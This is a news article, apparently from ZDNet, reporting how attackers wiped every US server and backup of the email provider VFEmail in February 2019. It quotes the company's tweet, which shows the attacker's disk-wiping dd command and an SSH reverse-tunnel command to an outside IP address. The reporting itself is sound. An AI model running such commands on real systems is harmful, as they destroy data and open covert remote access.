Hackers Wipe US Servers Of Email Provider VFEmail
Image: ZDNet
Hackers have breached the severs of email provider VFEmail.net and wiped the data from all its US servers, destroying all US customers’ data in the process.
The attack took place yesterday, February 11, and was detected after the company’s site and webmail client went down without notice.
“At this time, the attacker has formatted all the disks on every server,” the company said yesterday. “Every VM is lost. Every file server is lost, every backup server is lost.”
“This was more than a multi-password via SSH exploit, and there was no ransom. Just attack and destroy,” VFEmail said.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N— VFEmail.net (@VFEmail) February 11, 2019
The company’s staff is now working to recover user emails, but as things stand right now, all data for US customers appears to have been deleted for good and gone into /dev/null.
The company’s website is now back online, but its secondary domains are still down –such as chewiemail.com, clovermail.net, mail-on.us, manlymail.net, metadatamitigator.com, offensivelytolerant.com, openmail.cc, powdermail.com, and toothandmail.com.
US users accessing their respective VFEmail accounts will be greeted by empty inboxes. Users who can’t access their inboxes are advised to send themselves an email, according to an explanation on the company’s site.
There is also no spam filtering in place, but this is most likely going to be the last thing on the minds of VFEmail users, seeing that many have most likely lost sensitive information that they had backed up in their inboxes.
A VFEmail spokesperson was not available for comment at the time of publication.
It is rare that hackers take steps to wipe out an entire company’s data. Most attacks usually end up with hackers using compromised servers for other attacks (like running botnets or hosting malware), or with hackers asking for a ransom payment from hacked victims.
The largest ransom demand ever paid known to date is by Nayana, a South Korean web hosting company which dished out $1 million in Bitcoin after hackers breached its network and ran the Linux-based Erebus ransomware that encrypted data on thousands of customer’ servers.
Back in November 2015, VFEmail was one of the many online email providers that were targeted by Armada Collective, a group of hackers who demanded ransom payments from victim companies to stop ongoing DDoS attacks [1, 2].
In June 2014, Infrastructure-as-a-Service provider Code Spaces was forced to shut down after hackers similarly breached its servers and wiped servers.
More data breach coverage:
READ MORE HERE